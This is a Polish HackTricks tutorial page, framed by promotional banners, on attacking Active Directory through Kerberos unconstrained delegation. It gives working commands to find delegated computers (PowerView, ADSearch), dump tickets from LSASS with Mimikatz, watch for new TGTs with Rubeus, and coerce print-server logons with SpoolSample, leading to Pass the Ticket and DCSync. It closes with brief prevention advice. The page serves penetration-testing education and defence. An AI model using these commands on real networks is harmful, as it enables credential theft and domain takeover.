# Delegacja bez ograniczeń
Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)! * Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)! * Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family) * Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com) * **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
## Delegacja bez ograniczeń Jest to funkcja, którą administrator domeny może ustawić dla dowolnego **komputera** w domenie. Wtedy, za każdym razem, gdy **użytkownik loguje się** na komputerze, **kopia TGT** tego użytkownika zostanie **wysłana do TGS** dostarczonego przez DC **i zapisana w pamięci w LSASS**. Jeśli masz uprawnienia administratora na maszynie, będziesz mógł **wydobyć bilety i podszywać się pod użytkowników** na dowolnej maszynie. Jeśli administrator domeny zaloguje się na komputerze z aktywowaną funkcją "Delegacja bez ograniczeń", a ty masz uprawnienia lokalnego administratora na tej maszynie, będziesz mógł wydobyć bilet i podszywać się pod administratora domeny gdziekolwiek (przywileje domeny). Możesz **znaleźć obiekty komputerowe z tą właściwością**, sprawdzając, czy atrybut [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) zawiera [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). Możesz to zrobić za pomocą filtru LDAP „(userAccountControl:1.2.840.113556.1.4.803:=524288)”, co robi powerview:
# Wyświetl komputery bez ograniczeń
## Powerview
Get-NetComputer -Unconstrained #DCs zawsze się pojawiają, ale nie są przydatne do eskalacji uprawnień
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Eksportuj bilety za pomocą Mimikatz
privilege::debug
sekurlsa::tickets /export #Sposób zalecany
kerberos::list /export #Inny sposób

# Monitoruj logowania i eksportuj nowe bilety
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Sprawdzaj co 10 sekund nowe TGT
Załaduj bilet Administratora (lub ofiary) do pamięci za pomocą **Mimikatz** lub **Rubeus dla** [**Pass the Ticket**](pass-the-ticket.md)**.**\ Więcej informacji: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\ [**Więcej informacji o delegacji bez ograniczeń na stronie ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation) ### **Wymuś uwierzytelnianie** Jeśli atakujący jest w stanie **zakraść się na komputerze zezwalającym na "Delegację bez ograniczeń"**, może **oszukać** serwer **drukowania**, aby **automatycznie się zalogować** i **zapisać TGT** w pamięci serwera.\ Następnie atakujący mógłby przeprowadzić atak **Pass the Ticket, aby podszywać się** pod konto użytkownika serwera drukowania. Aby zmusić serwer drukowania do zalogowania się na dowolnej maszynie, można użyć [**SpoolSample**](https://github.com/leechristensen/SpoolSample): ```bash .\SpoolSample.exe ``` Jeśli TGT pochodzi od kontrolera domeny, można przeprowadzić atak [**DCSync**](acl-persistence-abuse/#dcsync) i uzyskać wszystkie hashe z kontrolera domeny.\ [**Więcej informacji na temat tego ataku na stronie ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) **Oto inne sposoby próby wymuszenia uwierzytelnienia:** {% content-ref url="printers-spooler-service-abuse.md" %} [printers-spooler-service-abuse.md](printers-spooler-service-abuse.md) {% endcontent-ref %} ### Zapobieganie * Ogranicz logowanie DA/Admin do konkretnych usług * Ustaw "Konto jest wrażliwe i nie można go delegować" dla kont uprzywilejowanych.
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)! * Pracujesz w **firmie cyberbezpieczeństwa**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? A może chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)! * Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family) * Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com) * **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR do repozytorium [hacktricks](https://github.com/carlospolop/hacktricks) i [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.